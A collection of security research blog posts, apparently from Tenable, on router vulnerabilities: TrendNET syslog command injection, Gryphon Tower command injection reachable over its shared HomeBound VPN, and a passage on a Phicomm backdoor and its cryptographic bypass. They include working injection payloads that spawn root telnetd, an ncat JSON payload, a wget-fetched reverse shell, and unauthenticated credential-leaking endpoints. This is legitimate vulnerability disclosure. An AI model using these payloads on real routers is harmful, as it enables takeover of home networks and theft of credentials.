ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Rooting Gryphon Routers via Shared VPN

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.

​​

Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = “/sbin/configure_repeater.sh “ .. “\”” .. ssid .. “\”” .. “ “ .. “\”” .. key .. “\”” .. “ “ .. “\”” .. hidden .. “\”” .. “ “ .. “\”” .. ssid5 .. “\”” .. “ “ .. “\”” .. key5 .. “\”” .. “ “ .. “\”” .. mssid .. “\”” .. “ “ .. “\”” .. mkey .. “\”” .. “ “ .. “\”” .. gssid .. “\”” .. “ “ .. “\”” .. gkey .. “\”” .. “ “ .. “\”” .. ghidden .. “\”” .. “ “ .. “\”” .. country .. “\”” .. “ “ .. “\”” .. bssid .. “\”” .. “ “ .. “\”” .. board .. “\”” .. “ “ .. “\”” .. wpa .. “\””
  os.execute(cmd)
os.execute(“touch /etc/rc_in_progress.txt”)
os.execute(“/sbin/mark_router.sh 2 &”)
luci.http.header(“Access-Control-Allow-Origin”,”*”)
luci.http.prepare_content(“application/json”)
luci.http.write(“{\”rc\”: \”OK\”}”)
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, stringing together commands using wget to grab a python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format : {“<operationNumber>” : {“<op parameter 1>”:”param 1 value”, …}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of “;id>/tmp/op41” would result in the output of the id command being output to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {“41”:{“cmd”:”;id>/tmp/op41”}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo ‘{“41”:{“cmd”:”;id>/tmp/op41"}}’ | ncat — ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

A Backdoor Lockpick

Reversing Phicomm’s Backdoor Protocols

TL;DR

  1. Phicomm’s router firmware has numerous critical vulnerabilities that can be chained together by a remote, unauthenticated attacker to gain a root shell on the device.
  2. Every Phicomm router firmware since at least 2017 exposes a cryptographically locked backdoor.
  3. I’ve analysed this backdoor’s network protocol through three distinct iterations, across eleven firmware versions.
  4. And I show how the backdoor’s cryptographic lock can be “picked” to grant a root shell to an attacker.
  5. Phicomm is no more. These devices will never be patched.
  6. Not only are Phicomm devices still on the market, but their surplus is being resold by other vendors, such as Wavlink, who occasionally neglect to reflash the device and ship it with the vulnerable Phicomm firmware.

A Phicomm in Wavlink’s Clothing

In early September, 2021, a fairly ordinary and inexpensive residential router came into the Zero Day research team’s possession.

The WAVLINK AC1200, an inexpensive WiFi Router.

It was branded as a Wavlink AC1200 WiFi Router, a model that you can find on Amazon for under $30.

When I plugged in the router and attempted to navigate the browser to its administrative interface — which, according to the sticker on the bottom of the router, should have been waiting for us at 192.168.10.1 –things took an unexpected turn. The router’s DHCP server, to begin with, had assigned us an address on the 192.168.2.0/24 subnet, with 192.168.2.1 as its default gateway.

And this is what was waiting to greet me:

This doesn’t look like WAVLINK firmware…

If the Amazon reviews for the WAVLINK AC1200 are anything to go by, I wasn’t alone in this particular situation.

Quite suspicious!

With a little help from Google Translate, I set about exploring this unexpected Phicomm interface. The System Status (系统状态) page identifies the device model as K2G, hardware version A1, running firmware version 22.6.3.20.

The System Status (系统状态) page in the Phicomm firmware’s administrative web UI.

An online search for “Phicomm K2G A1” turned up a few listings for this product, which indeed bears a striking resemblance to the “WAVLINK” router we’d received from Amazon. In many cases the item was listed as “discontinued”.

This looks familiar.
A familiar looking router, with the original Phicomm branding.
Do you see the difference? (The branding is the difference.)

I take a stab at reconstructing the story of how, exactly, K2G A1 routers with Phicomm firmware made their way to the market with WAVLINK branding in the Appendix to this post, but first let’s look at a few particularly interesting vulnerabilities in this misbegotten router.

How to Get the Wifi Password

It’s never a good idea to enable remote management on a residential router, but that rarely prevents vendors from offering this feature, and there will always be users unable to resist the temptation of exposing the controls to their LAN to the Internet at large, nominally protected by a flimsy password authentication mechanism at best.

Like many other residential routers, the Phicomm K2G A1 provides this feature, and a quick perusal of Shodan shows that remote management’s been enabled on many such devices.

If the user decides to enable remote management, the UI will suggest 8181 as the default port for the administrative web interface, and 255.255.255.255 as default netmask (which will expose port 8181 to the entire WAN, which in the case of most residential networks means the Internet).

A basic Shodan search suggests that plenty of users (most of them in China) have made precisely these choices when setting up their routers.

A shodan.io search, showing some results consistent with the remote management interface on certain Phicomm routers.
A shodan.io search for “port:8181 luci”, many of whose results bear a very close resemblance to the remote-management webserver on the Phicomm K2G router.

Access to the admin panel itself requires knowledge of the password that the user chose when setting up the router. Phicomm allows the user to save several seconds and ease the burden of memory by clicking a checkbox and setting the admin password to be the same as the 2.4GHz wireless password.

The Phicomm firmware’s administrative web server exposes a number of interfaces, such as /LocalMACConfig.asp or /wirelesssetup.asp, which can be used to get and set router configuration parameters without requiring any authentication whatsoever. This is especially hazardous when remote management has been enabled, since it effectively grants administrative control of several router settings to any passer-by on the internet, and discloses some highly sensitive information.

For example, if you’re curious what devices might be connected to the router’s local area network, all you need to do is issue a request to http://10.3.3.12:8181/LocalClientList.asp?action=get (assuming 10.3.3.12 is the router’s IP address and 8181 is its remote management port):

A screenshot showing how a LAN directory can be obtained from the management webserver without authentication.
Obtaining LAN information from the Phicomm management webserver, without authentication.

Here we see the Kali and pfSense VMs I’ve connected to the Phicomm router, along with an iPad that’s spoofing its MAC address.

But suppose we’d like to connect to this LAN ourselves. If the router’s nearby, we could try to connect to one of its WiFi networks. But how do we get the password? It turns out that all you need to do is ask and the router will gladly provide it:

Screenshot showing how the WiFi passwords can be obtained without authentication.
Obtaining the WiFi passwords from the remote management service without authentication.

If the owner of that router had taken Phicomm up on its suggestion that they use the same password for both the 2.4GHz wireless network and the administrative interface, then you now have remote administrative access to the router as well.

Screenshot of the Phicomm admin panel.
Phicomm explicitly offers to set the web admin password to the 2.4GHz WiFi password.

But even if you’re not so lucky, there are a number of setting operations that the pseudo-asp endpoints enable as well.

A screenshot of the Phicomm router’s web admin UI, showing the LAN information.
The LAN information page in the administrative web UI.
A screenshot showing how to rename hosts on the target’s LAN.
You can use the unauthenticated remote management endpoint to rename hosts on the target’s LAN.
The results of this renaming attack. This is a vector for pushing potentially malicious content into the administrative web UI.

If we were feeling a little less kind, or felt that this was a network that was best avoided and decided to take matters into our own hands, we could use the same interface to ban local users from the network.

We are also able to ban users from the LAN, from the WAN, without needing any prior authentication.
What the unfortunate client sees in their browser after being banned in this way.

This type of ban only bars access to the router and the WAN, and can be easily evaded by changing the client’s MAC address.

Changing the MAC address to evade the ban.

An unbanning request for a particular MAC address can be issued by setting BlockUser parameter to 0.

[+] Requesting url http://10.3.3.12:8181//LocalMACConfig.asp?action=set&BlockUser=0&MAC=A6%3aDC%3a5C%3aF6%3a2C%3a2B&IP=unknown&DeviceRename=kali&isBind=0&ifType=0&UpMax=0&DownMax=0&_=1642459782743
{'retMACConfigresult': {'ALREADYLOGIN': 0, 'MACConfigresult': 1}}
We see that the ban depends on the MAC address of the LAN-side client. We also see that this ban can be lifted in much the same way that it was imposed, by a WAN-side machine issuing unauthenticated requests.

The library responsible for handling these .asp endpoints is the lighttpd module, mod_mobileapp.so. Of the 68 or so endpoints defined by the administrative interface, 18 can be triggered without requiring any authentication from the user. These include wirelesssetup.asp and any bearing the prefix Local:

LocalCheckClientNumber.asp
LocalCheckDetectFinish.asp
LocalCheckInetHealthStatus.asp
LocalCheckInetLinkStatus.asp
LocalCheckInetSpeedStatus.asp
LocalCheckInterfacelink.asp
LocalCheckNetworkType.asp
LocalCheckRouterPassword.asp
LocalCheckWIFI.asp
LocalCheckWanStatus.asp
LocalCheckWifiPassword.asp
LocalCheckWirelessStatus.asp
LocalClientList.asp
LocalIndex.asp
LocalMACConfig.asp
LocalNetworkSet.asp
LocalStartAutodetect.asp
wirelesssetup.asp

Escalating from an Authenticated Admin Session to a Root Shell on the Router

Suppose that you’ve managed to access the admin panel on a Phicomm K2G A1 router, thanks to the careless exposure of the admin password through the non-authenticated /wirelesssetup.asp?action=get endpoint. Obtaining a root shell on the device is now fairly straightforward, due to a command injection vulnerability in the Phicomm interface, which appears to already be fairly well-known among Phicomm router hackers. Upantool has provided a comprehensive writeup documenting this attack vector (Google translate can be helpful here, if, like me, you can’t read Chinese).

A screenshot of a post-auth command injection attack, courtesy of UpanTool.

The command injection attack is triggered by submitting the string | /usr/sbin/telnetd -l /bin/login.sh where the firmware update menu asks for a time of day at which to check for updates. The router will pass the time of day given to a shell command, which it will run with root privileges, and the pipe symbol | will instruct it to send the output of the first command to a second, which is supplied by the attacker. The injected command, /usr/sbin/telnetd -l /bin/login.sh, opens a root shell that the attacker can connect to over telnet, on port 23.

This was indeed the method I used to obtain a root shell, explore the router’s runtime environment, and download its firmware to my workstation for further analysis. (I did this the easy way, by piping each block device through gzip and over netcat to my host, and then extracting the filesystems with binwalk.)

Verification that the command injection attack documented by UpanTool works.

The first thing I wanted to do when I got there was to look at the output of netstat -tunlp to see what other services might be listening on this device.

Using netstat on the router to find which services are listening on which UDP and TCP ports.

Notice the service listening on UDP port 21210, which netstat identifies as telnetd_startup. This service provides a cryptographically locked backdoor into the router, and in the next section, we’re going to see, first, how the lock works, and second, how to pick it.

Reverse Engineering the Phicomm Backdoor

The Phicomm telnetd_startup service superficially resembles Netgear’s telnetEnable daemon, and serves a similar purpose: to allow an authorized party to activate the telnet service, which will, in turn, provide that party with a root shell on the router. What distinguishes the Phicomm backdoor is not just its elaborate challenge-and-response protocol, but that it requires that the authorized party employ a private RSA key to unlock it. This requirement, however, is not foolproof, and a critical loophole in telnetd_startup allows an attacker to “pick” the cryptographic lock without any need of the key.

Initial State

telnetd_startup begins by listening unobtrusively on UDP port 21210. Until it receives a packet containing the magic 10-byte handshake, ABCDEF1234, it will remain completely silent. Nmap will report UDP port 21210 as open|filtered, and provide no clue as to what might be listening there.

Control flow diagram of the main event loop in the telnetd_startup binary.

If the service does receive the magic handshake, it will respond with a UDP packet of its own, carrying a 16-byte buffer. An analysis of the daemon’s binary code reveals the tell-tale constants of an MD5 hash function, which would be consistent with the length of 16 bytes.

Disassembly of the block of code in telnetd_startup that initializes the hasher used to produce the product-identifying message. This hasher can be recognized as MD5 by its tell-tale constants.

void md5_init(
uint *context)
{
*context = 0;
context[2] = 0x67452301;
context[1] = 0;
context[3] = 0xefcdab89;
context[4] = 0x98badcfe;
context[5] = 0x10325476;
return;
}
Control-flow diagram of the hashing function, recognizable as MD5.
void md5_add(uint *param_1,void *param_2,uint param_3)
{
uint uVar1;
uint uVar2;
uint __n;

uVar2 = (*param_1 << 0x17) >> 0x1a;
uVar1 = param_3 * 8 + *param_1;
__n = 0x40 - uVar2;
*param_1 = uVar1;
if (uVar1 < param_3 * 8) {
param_1[1] = param_1[1] + 1;
}
param_1[1] = param_1[1] + (param_3 >> 0x1d);
if (param_3 < __n) {
__n = 0;
}
else {
memcpy((void *)((int)param_1 + uVar2 + 0x18),param_2,__n);
FUN_00402004(param_1 + 2,param_1 + 6);
while( true ) {
uVar2 = 0;
if (param_3 < __n + 0x40) break;
FUN_00402004(param_1 + 2,(int)param_2 + __n);
__n = __n + 0x40;
}
}
memcpy((void *)((int)param_1 + uVar2 + 0x18),(void *)((int)param_2 + __n),param_3 - __n);
return;
}
The block of code responsible for sending the product-identifying hash back to the client that sends the router the initiating handshake token (“ABCDEF1234”).

With a bit of help and annotation, Ghidra decompiles that code block into the following C-code:

memset(&K2_COSTDOWN__VER_3.0_at_00414ba0,0,0x80);             memcpy(&K2_COSTDOWN__VER_3.0_at_00414ba0,"K2_COSTDOWN__VER_3.0",0x14);
memset(md5,0,0x58);
md5_init(md5);
md5_add(md5,&K2_COSTDOWN__VER_3.0_at_00414ba0,0x80);
md5_digest(md5,&HASH_OF_K2_COSTDOWN_at_4149a0);
MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30 = 0;
DAT_00414b74 = 0;
DAT_00414b78 = 0;
DAT_00414b7c = 0;
memcpy(&MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
&HASH_OF_K2_COSTDOWN_at_4149a0,
0x10);
sendto(SKT,
&MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
0x10,
0,
&src_addr,
addrlen);
CHECK_STATE_004147e0 = 0;

The string that gets hashed here is "K2_COSTDOWN__VER_3.0", a product identification string, which is first copied into a zeroed-out buffer 128 bytes in length. This can easily be verified.

Verification that the product-identifying message does indeed contain an MD5 hash of a descriptive string found in the telnetd_startup binary.

After this exchange, a global variable at address 0x004147e0 is switched from its initial value of 2 to 0, and the main loop of the server enters another iteration. What we’re looking at, here, is a finite state machine, and the handshake token, "ABCDEF1234" is what sends it from the initial state into the second.

Second State

Control flow diagram of the next stage of the protocol, where the second message received from the client is “decrypted” using a hard-coded public RSA key, a random secret is generated, and then the “decrypted” message is XORed with the random secret, which is then used to generate ephemeral passwords by the set_telnet_enable_keys() function.

In the second state, shown above, in basic block graph form, and below, decompiled into C code, five important things happen after the client replies to the message containing the product-identifying hash:

S = ingest_token(payload_buffer,2);
if (S != 2) {
memset(&PAYLOAD_00414af0,0,0x80);
memcpy(&PAYLOAD_00414af0,payload_buffer,number_of_bytes_received);
S = rsa_public_decrypt_payload();
if (S != 0) break;
CHECK_STATE_004147e0 = 1;
generate_random_plaintext();
rsa_encrypt_with_public_key();
sendto(SKT,&ENCRYPTED_at_4149f0,0x80,0,&src_addr,addrlen);
xor_decrypted_payload_with_plaintext();
set_telnet_enable_keys();
goto LAB_00401e1c;
}

1. Decryption of the client’s message with a public key

The reply, which is assumed to have been encrypted with the client’s private key, is then decrypted with a public RSA key that’s been hardcoded into the binary.

It’s unclear exactly what the designers of this algorithm expect the encrypted blob to contain, and indeed there’s nothing in what follows that would really constrain its contents in any way. This step to some extent resembles the authentication request stage of the SSH public key authentication protocol. This is where the client sends the server a request containing:

  1. the username,
  2. the public key to be used, and
  3. a signature

The signature is produced by first hashing a blob of data known to both parties — the username, for example, or session ID — and then encrypting that hash with the private key that corresponds to the public key sent (2). Something similar seems to be taking place at this stage of the Phicomm backdoor protocol, except that the content of the “signature” isn’t checked in any way. There’s no username, after all, for the client to provide, and just a single valid keypair in play, which determined by the server’s own hardcoded public key. (Thanks to my colleague, Katie Sexton, for highlighting this resemblance and helping me make sense of this stage of the protocol.)

Control flow graph of the function that “decrypts” the client’s message using the hardcoded public RSA key.

Note the constant 3 passed to the OpenSSL library function, RSA_public_decrypt, which specifies that no padding is to be used. This will make our lives a significantly easier in the near future.

int rsa_public_decrypt_payload(void)
{
RSA *rsa;
BIGNUM *a;
int n;
uint digest_len;
size_t length_of_decrypted_payload;
BIGNUM *local_18 [3];
rsa = RSA_new();
local_18[0] = BN_new();
a = BN_new();
BN_set_word(a,0x10001);
BN_hex2bn(local_18, "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA70 63CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650C DB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
rsa->e = a;
rsa->n = local_18[0];
memset(&DECRYPTED_PAYLOAD_at_4149d0,0,0x20);
n = RSA_size(rsa);
digest_len = RSA_public_decrypt(n,
&PAYLOAD_00414af0,
&DECRYPTED_PAYLOAD_at_4149d0,
rsa,
RSA_NO_PADDING);
if (digest_len < 0x101) {
length_of_decrypted_payload = strlen(&DECRYPTED_PAYLOAD_at_4149d0);
n = -(length_of_decrypted_payload < 0x101 ^ 1);
}
else {
n = -1;
}
return n;
}

Bizarrely, telnetd_startup at no point compares the result of this “decryption” with anything. It seems to rest content so long as the decryption function doesn’t outright fail, or yield a buffer of more than 256 bytes in length – which I’m not quite sure is even possible in this context, barring an undetected bug.

The n-component of the public key is stored in the binary as a hexadecimal string, and can be easily retrieved with the strings tool. The e-component is the usual 0x10001.

$ strings -n 256 usr/bin/telnetd_startup       
E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691

An interesting question to ask, here, might be this: what’s the point of this initial exchange? An initial handshake is sent to the router, the router sends back a 16-byte message that uniquely identifies the model, and the router then expects the client to reply with a message encrypted with a particular key private key. Why the handshake ("ABCDEF1234")? Why the product-identifying hash? Why not begin the interaction with the signed or “privately encrypted” message? This protocol would make sense if the client, whoever that might be, is expected to be in possession of a database that associates each product-identifying hash it might receive with its own private RSA key. If this were to be the case, then we might be looking at a particular implementation of a general backdoor protocol.

2. A random secret is generated

A random secret consisting of exactly 31 printable ASCII characters is generated. That these characters are printable will turn out to be a helpful constraint.

Control-flow graph of the function that generates a random, 31-character secret.

3. The random secret is encrypted

The random secret is then encrypted using the hardcoded public RSA key, such that the only feasible way to decrypt it will be with the corresponding private key.

int rsa_encrypt_with_public_key(void)
{
RSA *rsa;
BIGNUM *a;
int iVar1;
BIGNUM *local_18 [3];
rsa = RSA_new();
local_18[0] = BN_new();
a = BN_new();
BN_set_word(a,0x10001);
BN_hex2bn(local_18, "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA70 63CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650C DB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
rsa->e = a;
rsa->n = local_18[0];
memset(&ENCRYPTED_at_4149f0,0,0x80);
iVar1 = RSA_size(rsa);
iVar1 = RSA_public_encrypt(iVar1,
&RANDOMLY_GENERATED_PLAINTEXT_at_4149b0,
&ENCRYPTED_at_4149f0,
rsa,
3);
return iVar1 >> 0x1f;
}

4. The random, plaintext secret is XORed with the client’s message

This seems like a particularly strange move to me, a needless twist of complexity that, far from improving the security of the system, will afford a means for completely undoing it. The “decrypted” message received from the client in step 1 of state 2 — “decrypted”, remember, with the public key — is bitwise-xored with the random secret.

Control-flow graph of the function that calculates the bitwise-XOR of the random secret and the result of “decrypting” the client’s second message.
void xor_decrypted_payload_with_plaintext(void)
{
byte *pbVar1;
byte *pbVar2;
int i;
byte *pbVar3;

i = 0;
do {
pbVar1 = &DECRYPTED_PAYLOAD_at_4149d0 + i;
pbVar2 = &RANDOMLY_GENERATED_PLAINTEXT_at_4149b0 + i;
pbVar3 = &XORED_MSG_00414b80 + i;
i = i + 1;
*pbVar3 = *pbVar1 ^ *pbVar2;
} while (i != 0x20);
return;
}

5. The resulting string is used to construct ephemeral passwords

Here’s where things truly break down. The string produced by XORing the random plaintext secret with the client’s “decrypted” message is concatenated with two hardcoded salts: "+PERM" and "+TEMP". The resulting concatenations are then hashed with the same MD5 algorithm used earlier to produce the product identifier. The resulting 16-byte hashes are then set as the ephemeral passwords that, if correctly guessed, will allow the client to unlock the backdoor.

int set_telnet_enable_keys(void)
{
size_t xor_str_len;
char xor_str_perm [512];
char xor_str_temp [512];
uint md5 [22];

sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);
memset(md5,0,0x58);
md5_init(md5);
xor_str_len = strlen(xor_str_perm);
md5_add(md5,xor_str_perm,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
md5_init(md5);
xor_str_len = strlen(xor_str_temp);
md5_add(md5,xor_str_temp,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);
return 0;
}

Can you see the problem here? Think it over. We’ll come back to this in a minute.

Verifying things in the GDB

Once I had a general idea of how all the pieces fit together, I wanted to test my understanding of things by pushing a static MIPS build of gdbserver to the router, and then step through the telnetd_startup state machine with gdb-multiarch and my favourite gdb extension library, gef.

As I understood it, it seemed that telnetd_startup was expecting me, the client, to decrypt its secret message using the private RSA key that corresponds to the public key coded into the binary. Since I did not, in fact, possess that key, and since OpenSSL’s RSA implementation seemed like a tough nut to crack, I figured that I could verify my conjectures by simply cheating. I learned that if I just use the debugger to grab the random plaintext secret from the buffer at address 0x004149b0, salt it with the suffix "+TEMP", MD5-hash it, and send back the result, then I am in fact able to drive the state machine to its final destination, where system("telnetd -l /bin/login.sh") is called and the backdoor is thrown wide open. So long as I chose, for my second message, a string that I knew would be “decrypted” into a buffer of null bytes by the hardcoded public RSA key — and this is rather easy to do — I knew that that method would produce the correct ephemeral password. This gave me a pretty good indication of what we need to do in order to open the backdoor without the assistance of a debugger, and without peeking at memory that, in a realistic scenario, an attacker would have no means of seeing.

Screenshot of a debugger session (gdb-multiarch + gef), a python REPL, and a telnet session that shows how by reading the random secret directly from memory we can calculate the ephemeral password needed to initialize a telnet session. The client’s second message, in this scenario, is chosen so that the hardcoded public RSA key “decrypts” it to a buffer of null bytes.

What this proves is that all we need to do in order to open the backdoor is to either discover the private RSA key, or else guess the 31-character secret string. The odds of guessing a random string at that length are abysmal, and so, armed with the public RSA key, I focussed, at first, on rummaging around the internet for some trace of that key (in various formats) in hopes that I might find the complete key pair just lying around. A long shot, sure, but worth checking. It did not, however, pay off.

At this point I still hadn’t quite noticed the critical loophole that I mentioned earlier. It came while I was patiently sketching out the protocol diagram, shown below.

The Backdoor Protocol

Here is a complete protocol diagram of the Phicomm backdoor, as apparently intended to be used:

Picking the Backdoor’s Lock

Remember how I said, regarding step 5 of state 2, that things break down in the construction of the two ephemeral passwords? The first thing to observe here is how the XORed strings are concatenated with the two salts:

sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);

We can expand XORED_MSG_00414b80 to make its construction a bit clearer, like so:

sprintf(xor_str_temp, 
"%s+TEMP",
xor(SECRET_PLAINTEXT,
RSA_public_decrypt(HARDCODED_PUBLIC_KEY,
ENCRYPTED_XOR_MASK)));
temp_password = MD5(xor_str_temp);

And mutatis mutandis for +PERM. Now, the format specifier %sas used by sprintf is not meant to handle just any byte arrays whatsoever. It’s meant to handle strings — null-terminated strings, to be precise. The array of bytes at &XORED_MSG_00414b80 might, in the mind of the developer, be 31 bytes long, but in the eyes of sprintf() it ends where the first null byte occurs.

If the value of the first byte of that “string” is zero (i.e, '\x00', not the ASCII numeral '0'), then %s will format it as an empty string!

If &XORED_MSG_00414b80 is treated as an empty string, then xor_str_temp and xor_str_perm are just going to be "+TEMP" and "+PERM". The random component is completely dropped! Their MD5 hashes will be entirely predictable. When that happens, this code

memset(md5,0,0x58);  
md5_init(md5);
xor_str_len = strlen(xor_str_perm);
md5_add(md5,xor_str_perm,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
md5_init(md5);
xor_str_len = strlen(xor_str_temp);
md5_add(md5,xor_str_temp,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);

will produce precisely these two hashes:

In [53]: salt = b"+TEMP" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[53]: 'f73fbf2e90e43136f07279c745f2f9f2'
In [54]: salt = b"+PERM" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[54]: 'c423a902bacd28bafd095350d66e7455'

What this means is that all we have to do to produce a situation where we can predict the two ephemeral passwords is to make it likely that

XORED_MSG_00414b80[0] == DECRYPTED_PAYLOAD_at_4149d0[0] ^ RANDOMLY_GENERATED_PLAINTEXT_at_4149b0[0] == '\x00'

This turns out to be easy.

In the absence of padding (i.e., when the padding variable is set to RSA_NO_PADDING (=3)),RSA_public_decrypt() will “successfully” transform the vast majority of 128-byte buffers into non-null buffers. Just to get a ballpark idea of the odds, here’s what I found when I used the hardcoded public RSA key provided to “decrypt” 1000 random buffers, in the Python REPL:

In [23]: D = [pub_decrypt(os.urandom(0x80), padding=None) for i in range(1000)]      
